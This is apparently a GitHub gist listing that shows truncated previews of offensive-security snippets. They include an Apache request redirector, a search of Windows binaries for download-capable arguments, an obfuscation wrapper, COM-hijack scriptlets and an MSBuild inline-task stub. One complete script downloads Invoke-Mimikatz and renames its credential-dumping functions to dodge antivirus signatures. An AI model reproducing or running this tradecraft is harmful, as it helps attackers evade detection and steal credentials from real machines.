This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
# | |
# Note this version requires Apache 2.4+ | |
# | |
# Save this file into something like /etc/apache2/redirect.rules. | |
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom | |
# | |
# Include /etc/apache2/redirect.rules | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$exepath = "c:\windows" | |
$searchstrings = @("/url", "/uri", "/wildcard", "/format", "/path") | |
$skip = @("logoff.exe", "mcrmgr.exe", "audit.exe") | |
$foundin = @() | |
$testedbins = @() | |
Function Execute-Command ($commandPath, $commandArguments) | |
{ | |
$pinfo = New-Object System.Diagnostics.ProcessStartInfo | |
$pinfo.FileName = $commandPath |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function obs() | |
{ | |
Import-Module Invoke-Obfuscation | |
$s = Get-Clipboard | |
if ($s -eq $null) | |
{ | |
Write-Host "Clipboard is nulll." | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Excel01 = New-Object -ComObject "Excel.Application" | |
$ExcelVersion = $Excel01.Version | |
$Excel01.DisplayAlerts = $false | |
$Excel01.Visible = $false | |
$wid=[System.Security.Principal.WindowsIdentity]::GetCurrent() | |
$prp=new-object System.Security.Principal.WindowsPrincipal($wid) | |
$adm=[System.Security.Principal.WindowsBuiltInRole]::Administrator | |
$IsAdmin=$prp.IsInRole($adm) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="COMHijackTesting" | |
remoteable="true" | |
version="1.00" | |
classid="{00000001-0001-0001-0001-0000DEADBEEF}" > | |
</registration> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
classid="{00000001-0001-0001-0001-0000DEADBEEF}" | |
remotable="true" | |
> | |
</registration> | |
<script language="JScript"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<Target Name="Business"> | |
<BusinessTime /> | |
</Target> | |
<UsingTask | |
TaskName="BusinessTime" | |
TaskFactory="CodeTaskFactory" | |
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
<ParameterGroup/> | |
<Task> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Const HKLM = &H80000002 'HKEY_LOCAL_MACHINE | |
strComputer = "." | |
strKey = "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" | |
Set objLocator = CreateObject("WbemScripting.SWbemLocator") | |
Set objReg = objLocator.ConnectServer(strComputer, "root\cimv2").Get("StdRegProv") | |
objReg.EnumKey HKLM, strKey, arrSubKeys | |
objReg.GetDWORDValue HKLM, strkey, "ProcessCreationIncludeCmdLine_Enabled", isenabled | |
If IsNull(isenabled) Then |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
# Uncomment below two lines to clean comments from all .ps1 files in ./ | |
#find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \; | |
#find ./ -name "*.ps1" -exec sed -i -e 's/#.*$//' {} \; | |
sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1 | |
sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1 | |
sed -i -e's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1 | |
sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
set PROMPT %red%L %yel%J %grn%S %blu%W | |
load nessus | |
load pentest | |
load sounds | |
load alias | |
alias j "jobs -v" | |
alias s "sessions -v" | |
alias -f w "workspace" | |
alias so "show options" | |
alias sa "show advanced" |
NewerOlder